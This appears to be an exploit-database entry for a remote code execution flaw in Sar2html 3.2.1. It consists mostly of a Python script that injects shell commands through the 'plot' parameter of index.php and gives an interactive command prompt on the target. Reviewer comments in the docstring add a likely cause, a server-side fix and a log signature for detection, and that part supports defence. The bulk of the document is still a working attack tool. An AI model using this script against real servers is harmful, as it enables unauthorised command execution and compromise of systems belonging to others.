Exploits / Vulnerability Discovered : 2021-01-04 |
Type : webapps |
Platform : php
This exploit / vulnerability, Sar2html 3.2.1 plot remote code execution, is for educational purposes only; if you use it, you do so at your own risk!
def exploiter(cmd):
    """Send one request carrying *cmd* in the ``plot`` parameter and print the reply.

    The request is a GET to ``{url}/index.php`` whose ``plot`` query value is
    ``;`` followed by *cmd*. The response body is then searched for
    ``<option value=...>`` elements, and every captured value that does not
    look like one of the page's own placeholder entries is printed.

    Defender notes:
      * The page title describes this as a remote code execution issue in
        Sar2html 3.2.1. Presumably the server hands ``plot`` to a shell
        without sanitising it -- confirm against the application source.
        The fix belongs on the server: validate ``plot`` against the
        expected values and avoid building shell commands from it.
      * The injected text travels in the query string, so web-server access
        logs should show ``index.php`` requests whose ``plot`` value begins
        with ``;`` (possibly percent-encoded). That is a usable detection
        signature.
      * Until the server is fixed, keep the application off untrusted
        networks.

    Args:
        cmd: Text appended after ``plot=;`` in the request URL.
    """
    global url
    http = requests.session()
    response = http.get(f"{url}/index.php?plot=;{cmd}")
    try:
        values = re.findall("<option value=(.*?)>", response.text)
    except:
        # NOTE(review): the bare except hides the real error, and `values`
        # stays unbound on this path, so the loop below raises NameError.
        print("Error!!")
    # Substrings that mark the page's own <option> entries rather than
    # returned output; "null selected" is already covered by "selected".
    placeholders = ("There is no defined host...", "null selected", "selected")
    for value in values:
        if any(marker in value for marker in placeholders):
            continue
        print(value)
    print()
# Script entry point. Terminal is defined outside this excerpt; cmdloop()
# suggests a cmd.Cmd-style interactive prompt -- confirm against the full file.
if __name__ == "__main__":
    terminal = Terminal()
    terminal.cmdloop()